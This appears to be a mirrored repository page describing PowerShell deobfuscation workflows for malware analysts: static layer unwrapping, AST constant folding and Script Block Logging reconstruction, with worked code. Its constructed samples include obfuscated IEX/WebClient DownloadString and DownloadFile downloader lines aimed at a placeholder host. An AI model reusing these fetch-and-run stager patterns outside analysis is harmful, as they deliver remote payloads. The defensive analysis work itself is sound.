mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-06-11 13:44:56 +03:00
PowerShell Deobfuscation Workflows
Workflow 1: Automated Multi-Layer Deobfuscation

    [Obfuscated Script] --> [Identify Techniques] --> [Remove Tick Marks]
                                                              |
                                                              v
                                                    [Resolve Concatenation]
                                                              |
                                                              v
                                                    [Decode Base64 Layers]
                                                              |
                                                              v
                                                     [IEX -> Write-Output]
                                                              |
                                                              v
                                                    [Extract Final Payload]

Notes:
- Strip only the backticks that are pure token splitters (I`E`X). A tick in front of 0, a, b, e, f, n, r, t, u or v is an escape sequence, and removing it changes the string.
- -EncodedCommand payloads are UTF-16LE. Inline [Convert]::FromBase64String() blobs use whatever encoding the surrounding GetString() call names, so read that call before decoding.
- Rewrite every Invoke-Expression (IEX) sink to Write-Output before anything is run, then repeat the whole pass until the text stops changing: the loop, not any single step, is what handles stacked layers.
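The static pass above, written out as an added example (not the project's own code): regex-based tick removal, concatenation folding, base64 decoding and IEX-to-Write-Output rewriting, looped until a layer stops changing. The three-layer sample at the bottom is constructed here (the host is under the reserved .invalid TLD) and is never executed; the function names (Invoke-Unwrap, Get-Ioc and the rest) are the example's own. PowerShell 5.0 or later is assumed.

```powershell
# Added example, not the project's code: one pass of Workflow 1 implemented as
# pure text rewriting. The sample one-liner at the bottom is constructed here
# (example.invalid is a reserved TLD) and is never executed.

function Remove-TickMarks {
    param([string]$Text)
    # Obfuscators split tokens with no-op backticks (I`E`X). Keep a tick that
    # forms a real escape sequence (`0 `a `b `e `f `n `r `t `u `v `` `" `$) so
    # the string semantics of the script survive.
    return [regex]::Replace($Text, '`(?![0abefnrtuv`"$])', '')
}

function Resolve-Concatenation {
    param([string]$Text)
    # 'a'+"b" chains fold two operands per pass and ((('x'))) grouping parens
    # unwrap one level per pass, so loop until the text stops changing. The
    # lookbehind keeps Foo('x') call parens from being treated as grouping.
    $pair  = '(?<q>[''"])(?<a>[^''"]*)\k<q>\s*\+\s*(?<q2>[''"])(?<b>[^''"]*)\k<q2>'
    $group = '(?<![\w\]])\(\s*(''[^'']*'')\s*\)'
    do {
        $before = $Text
        $Text = [regex]::Replace($Text, $pair, { param($m) "'" + $m.Groups['a'].Value + $m.Groups['b'].Value + "'" })
        $Text = [regex]::Replace($Text, $group, '$1')
    } while ($Text -ne $before)
    return $Text
}

function Expand-Base64Layer {
    param([string]$Text)
    # Form 1: powershell -e/-ec/-enc/-EncodedCommand <b64>. The argument is the
    # whole next layer, UTF-16LE encoded, so return it directly.
    $enc = [regex]::Match($Text, '(?i)(?<=\s)-e(?:c|n[a-z]*)?\s+(?<b64>[A-Za-z0-9+/=]{16,})')
    if ($enc.Success) {
        return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($enc.Groups['b64'].Value))
    }
    # Form 2: [Text.Encoding]::X.GetString([Convert]::FromBase64String('...'))
    # embedded in a larger expression; swap the call for the decoded literal.
    # The literal is not re-escaped because this text is analysed, never run.
    $encodings = @{ UTF8 = [Text.Encoding]::UTF8; Unicode = [Text.Encoding]::Unicode; ASCII = [Text.Encoding]::ASCII }
    $inline = '\[(?:System\.)?Text\.Encoding\]::(?<enc>UTF8|Unicode|ASCII)\.GetString\(\s*' +
              '\[(?:System\.)?Convert\]::FromBase64String\(\s*[''"](?<b64>[A-Za-z0-9+/=]+)[''"]\s*\)\s*\)'
    return [regex]::Replace($Text, $inline, {
        param($m)
        $bytes = [Convert]::FromBase64String($m.Groups['b64'].Value)
        "'" + $encodings[$m.Groups['enc'].Value].GetString($bytes) + "'"
    })
}

function Convert-IexToWriteOutput {
    param([string]$Text)
    # Turn the execution sink into a print so a decoded layer is shown, not run
    return [regex]::Replace($Text, '(?i)\b(?:iex|invoke-expression)\b', 'Write-Output')
}

function Invoke-Unwrap {
    param([string]$Script, [int]$MaxLayers = 10)
    $layers = [System.Collections.Generic.List[string]]::new()
    $layers.Add($Script)
    for ($i = 0; $i -lt $MaxLayers; $i++) {
        $next = Convert-IexToWriteOutput (Expand-Base64Layer (Resolve-Concatenation (Remove-TickMarks $Script)))
        # A layer that reduced to Write-Output '<code>' is printing the next layer
        if ($next -match '(?s)^\s*Write-Output\s*\(?\s*''(?<inner>.*)''\s*\)?\s*$') { $next = $Matches['inner'] }
        if ($next -eq $Script) { break }
        $layers.Add($next)
        $Script = $next
    }
    return [pscustomobject]@{ Final = $Script; Layers = $layers }
}

function Get-Ioc {
    param([string]$Text)
    # URLs and IPv4 literals in the clear-text layer
    [regex]::Matches($Text, '(?i)\bhttps?://[^\s''")]+|\b(?:\d{1,3}\.){3}\d{1,3}\b') | ForEach-Object Value
}

# Constructed three-layer sample, encoded here so the base64 is exact:
# -enc (UTF-16LE) wraps an inline UTF-8 blob, which wraps a tick-split downloader.
$inner  = 'I`E`X (Ne`w-Obje`ct Net.WebClient).DownloadString((''http://exam''+''ple.invalid/stage2''))'
$middle = 'I`EX([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(''' +
          [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($inner)) + ''')))'
$outer  = 'powershell -nop -w hidden -enc ' + [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($middle))

$result = Invoke-Unwrap $outer
$i = 0; foreach ($layer in $result.Layers) { "--- layer $i ---"; $layer; $i++ }
'--- IOCs ---'; Get-Ioc $result.Final
```

Each layer is printed as it is peeled, so a false fold (for example a tick stripped from a real escape) is visible at the layer where it happened rather than only in the final text. The final layer here is `Write-Output (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')`, with the URL reported as the IOC.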
Workflow 2: AST-Based Analysis

    [Script Input] --> [Parse AST] --> [Walk Expression Nodes] --> [Evaluate Expressions]
                                                                           |
                                                                           v
                                                                  [Reconstruct Commands]
                                                                           |
                                                                           v
                                                                      [Extract IOCs]

Notes:
- [System.Management.Automation.Language.Parser]::ParseInput() builds the tree without running the script, so this workflow is safe on untrusted input.
- Evaluate only subtrees made entirely of constants (string '+' chains, the -f format operator, grouping parentheses). Anything that touches a variable or a method call needs the sandbox in Workflow 3.
- Backtick splitting disappears at the parse stage: CommandAst.GetCommandName() already returns IEX for I`E`X, so command names can be matched without a text pass.
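The AST workflow as an added example (not the project's code, and not a PowerShell API beyond the parser types it uses): a constant folder over System.Management.Automation.Language nodes, a splicer that rewrites the script text from the folded extents, and a command and IOC listing over the result. The sample script is constructed for the demo, and the function names (Get-FoldedValue, Resolve-ObfuscatedText, Get-CommandSummary) are the example's own. PowerShell 5.0 or later is assumed for `using namespace`.

```powershell
# Added example, not the project's code: Workflow 2 on top of the PowerShell
# parser. Nothing is executed; constants are folded from the AST, the folded
# extents are spliced back into the text, and commands and IOCs are read from
# the result. The sample script at the bottom is constructed for this demo.
using namespace System.Management.Automation.Language

function Get-SoleExpression {
    param([Ast]$Stmt)
    # Unwrap a statement that is just one expression, optionally inside a one-element pipeline
    if ($Stmt -is [PipelineAst] -and $Stmt.PipelineElements.Count -eq 1) { $Stmt = $Stmt.PipelineElements[0] }
    if ($Stmt -is [CommandExpressionAst]) { return $Stmt.Expression }
    return $null
}

function Get-FoldedValue {
    param([Ast]$Node)
    # Constant-fold the shapes obfuscators favour. $null means "depends on runtime
    # state" (variables, method calls), which this pass refuses to guess at.
    if ($null -eq $Node) { return $null }
    if ($Node -is [StringConstantExpressionAst]) { return $Node.Value }
    if ($Node -is [ParenExpressionAst]) { return Get-FoldedValue (Get-SoleExpression $Node.Pipeline) }
    if ($Node -is [ArrayLiteralAst]) {
        $items = New-Object System.Collections.ArrayList
        foreach ($e in $Node.Elements) {
            $v = Get-FoldedValue $e
            if ($null -eq $v) { return $null }
            [void]$items.Add($v)
        }
        return ,$items.ToArray()          # comma keeps the array intact as one return value
    }
    if ($Node -is [BinaryExpressionAst]) {
        $l = Get-FoldedValue $Node.Left
        $r = Get-FoldedValue $Node.Right
        if ($null -eq $l -or $null -eq $r) { return $null }
        if ($Node.Operator -eq [TokenKind]::Plus)   { return [string]$l + [string]$r }
        if ($Node.Operator -eq [TokenKind]::Format) { return [string]$l -f $r }
    }
    return $null
}

function Resolve-ObfuscatedText {
    param([string]$Code)
    $tokens = $null; $errors = $null
    $ast = [Parser]::ParseInput($Code, [ref]$tokens, [ref]$errors)
    $folded = @{}
    foreach ($n in $ast.FindAll({ $args[0] -is [ParenExpressionAst] -or $args[0] -is [BinaryExpressionAst] }, $true)) {
        $v = Get-FoldedValue $n
        if ($v -is [string]) { $folded[$n] = $v }
    }
    # Keep only the outermost folded nodes (an inner 'a'+'b' is covered by its
    # parent), then splice from the highest offset down so earlier offsets hold.
    $outer = foreach ($n in $folded.Keys) {
        $p = $n.Parent; $nested = $false
        while ($null -ne $p) { if ($folded.ContainsKey($p)) { $nested = $true; break }; $p = $p.Parent }
        if (-not $nested) { $n }
    }
    foreach ($n in ($outer | Sort-Object { $_.Extent.StartOffset } -Descending)) {
        $literal = "'" + $folded[$n].Replace("'", "''") + "'"
        $Code = $Code.Substring(0, $n.Extent.StartOffset) + $literal + $Code.Substring($n.Extent.EndOffset)
    }
    return $Code
}

function Get-CommandSummary {
    param([string]$Code)
    $tokens = $null; $errors = $null
    $ast = [Parser]::ParseInput($Code, [ref]$tokens, [ref]$errors)
    # Constant assignments, so $var references in command arguments can be annotated
    $vars = @{}
    foreach ($a in $ast.FindAll({ $args[0] -is [AssignmentStatementAst] }, $true)) {
        $v = Get-FoldedValue (Get-SoleExpression $a.Right)
        if ($a.Left -is [VariableExpressionAst] -and $v -is [string]) { $vars[$a.Left.VariablePath.UserPath] = $v }
    }
    foreach ($c in $ast.FindAll({ $args[0] -is [CommandAst] }, $true)) {
        # GetCommandName() already has backtick escapes resolved (I`EX -> IEX)
        $name = $c.GetCommandName(); if (-not $name) { $name = $c.CommandElements[0].Extent.Text }
        $argText = @($c.CommandElements | Select-Object -Skip 1 | ForEach-Object { $_.Extent.Text }) -join ' '
        foreach ($k in $vars.Keys) { $argText = $argText.Replace('$' + $k, '$' + $k + '=<' + $vars[$k] + '>') }
        [pscustomobject]@{ Command = $name; Arguments = $argText; ExecSink = ($name -match '^(iex|invoke-expression)$') }
    }
}

# Constructed sample: concatenation, -f reordering, a tick-split IEX and a URL
# assembled into a variable. example.invalid never resolves.
$sample = @'
&(('Ne'+'w-Ob'+'ject')) ("{2}{0}{1}" -f 'Web','Client','Net.') | Out-Null
$u = ('ht'+'tp://exam'+'ple.invalid/s'+'tage2')
I`EX ((New-Object Net.WebClient).DownloadString($u))
'@
$clean = Resolve-ObfuscatedText $sample
'--- folded ---'; $clean
'--- commands ---'; Get-CommandSummary $clean | Format-Table -AutoSize
'--- IOCs ---'; [regex]::Matches($clean, '(?i)\bhttps?://[^\s''")]+') | ForEach-Object Value
```

Folding works on extents rather than on regexes, so a `+` or quote inside a legitimate string can never be mistaken for an operator, and anything the folder cannot prove constant is left exactly as written. On this sample the first line folds to `&'New-Object' 'Net.WebClient' | Out-Null`, the command table flags IEX as the execution sink with `$u=<http://example.invalid/stage2>` annotated in its argument, and the URL is the extracted IOC.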
Workflow 3: Dynamic Sandbox Deobfuscation

    [Obfuscated Script] --> [Execute in Sandbox] --> [Capture ScriptBlock Logs]
                                                              |
                                                              v
                                                   [Event ID 4104 Analysis]
                                                              |
                                                              v
                                                  [Reconstruct Execution Chain]

Steps:
- Enable Logging: Turn on PowerShell Script Block Logging (PowerShell 5.0 and later) through Group Policy or the registry value EnableScriptBlockLogging=1 under HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging. Blocks are written to Microsoft-Windows-PowerShell/Operational as Event ID 4104, at Verbose level; the engine raises a block to Warning when its own suspicious-content check fires, and logs those even when the policy is off.
- Execute: Run the obfuscated script in an isolated sandbox with no route to production networks; the first stage is frequently a downloader.
- Collect: Gather all 4104 entries. Every script block the engine compiles, including each string handed to Invoke-Expression, is logged as its own event, so the clear-text layers appear in execution order. Very large blocks are split into numbered fragments (MessageNumber of MessageTotal) that share one ScriptBlockId.
- Reconstruct: Reassemble fragments by ScriptBlockId, then order the blocks by time to follow the chain from the outer loader to the final payload.
- Extract: Pull IOCs from the reconstructed clear-text script. Anything that never becomes PowerShell code (an assembly passed to [Reflection.Assembly]::Load, a dropped binary) appears only as the call that loads it, not as its contents.
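The five steps above as an added example (not the project's code): one helper writes the policy value, one projects live 4104 events into a flat record using the field order of the event's EventData, and one reassembles fragments into a single block per ScriptBlockId in first-seen order. The events fed in at the bottom are constructed so the reassembly runs on any machine; inside the sandbox, pipe Get-ScriptBlockEvents into Join-ScriptBlocks instead. The function names are the example's own, and Enable-ScriptBlockLogging needs an elevated shell.

```powershell
# Added example, not the project's code: Workflow 3 as three helpers. The events
# fed in at the bottom are constructed; on the sandbox, use Get-ScriptBlockEvents.

function Enable-ScriptBlockLogging {
    # Same value Group Policy sets; run elevated inside the sandbox VM
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    Set-ItemProperty -Path $key -Name EnableScriptBlockLogging -Value 1 -Type DWord
}

function Get-ScriptBlockEvents {
    param([datetime]$Since = (Get-Date).AddHours(-1))
    # 4104 EventData fields, in order: MessageNumber, MessageTotal, ScriptBlockText, ScriptBlockId, Path
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $Since } |
        ForEach-Object {
            [pscustomobject]@{
                TimeCreated   = $_.TimeCreated
                MessageNumber = [int]$_.Properties[0].Value
                MessageTotal  = [int]$_.Properties[1].Value
                Text          = [string]$_.Properties[2].Value
                ScriptBlockId = [string]$_.Properties[3].Value
                Path          = [string]$_.Properties[4].Value
                Level         = $_.LevelDisplayName   # Warning = the engine's own suspicious-content check fired
            }
        }
}

function Join-ScriptBlocks {
    param([Parameter(ValueFromPipeline)]$Event)
    # Fragments of one large block share a ScriptBlockId; stitch them in MessageNumber
    # order. Groups come out in first-seen order, which is the execution chain: a layer
    # handed to IEX compiles, and is logged, after the layer that decoded it.
    begin { $groups = [ordered]@{} }
    process {
        if (-not $groups.Contains($Event.ScriptBlockId)) { $groups[$Event.ScriptBlockId] = @() }
        $groups[$Event.ScriptBlockId] += $Event
    }
    end {
        foreach ($id in $groups.Keys) {
            $parts = @($groups[$id] | Sort-Object MessageNumber)
            [pscustomobject]@{
                ScriptBlockId = $id
                FirstSeen     = $parts[0].TimeCreated
                Complete      = ($parts.Count -eq $parts[0].MessageTotal)   # false if a fragment was missed
                Path          = $parts[0].Path
                Level         = $parts[0].Level
                Text          = -join ($parts | ForEach-Object Text)
            }
        }
    }
}

# Constructed events: an outer loader, then the downloaded stage logged as two
# fragments that arrive out of order. example.invalid never resolves.
$t0 = Get-Date
$sampleEvents = @(
    [pscustomobject]@{ TimeCreated = $t0; MessageNumber = 1; MessageTotal = 1; ScriptBlockId = 'id-loader'; Path = ''; Level = 'Warning'
                       Text = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')" }
    [pscustomobject]@{ TimeCreated = $t0.AddSeconds(2); MessageNumber = 2; MessageTotal = 2; ScriptBlockId = 'id-stage2'; Path = ''; Level = 'Verbose'
                       Text = "`$c.DownloadFile('http://example.invalid/payload.bin', `"`$env:TEMP\p.bin`")" }
    [pscustomobject]@{ TimeCreated = $t0.AddSeconds(1); MessageNumber = 1; MessageTotal = 2; ScriptBlockId = 'id-stage2'; Path = ''; Level = 'Verbose'
                       Text = "`$c = New-Object Net.WebClient; " }
)
$chain = $sampleEvents | Join-ScriptBlocks
$chain | Format-List ScriptBlockId, FirstSeen, Complete, Level, Text
'--- IOCs ---'; [regex]::Matches(($chain.Text -join "`n"), '(?i)\bhttps?://[^\s''")]+') | ForEach-Object Value
```

The Complete flag is the check worth keeping: a chain whose last block is missing a fragment has no final payload to extract, and the gap usually means the collection window was too short or the log was overwritten. Both URLs come out as IOCs because the second stage was logged in clear text when IEX compiled it, which is the whole point of this workflow.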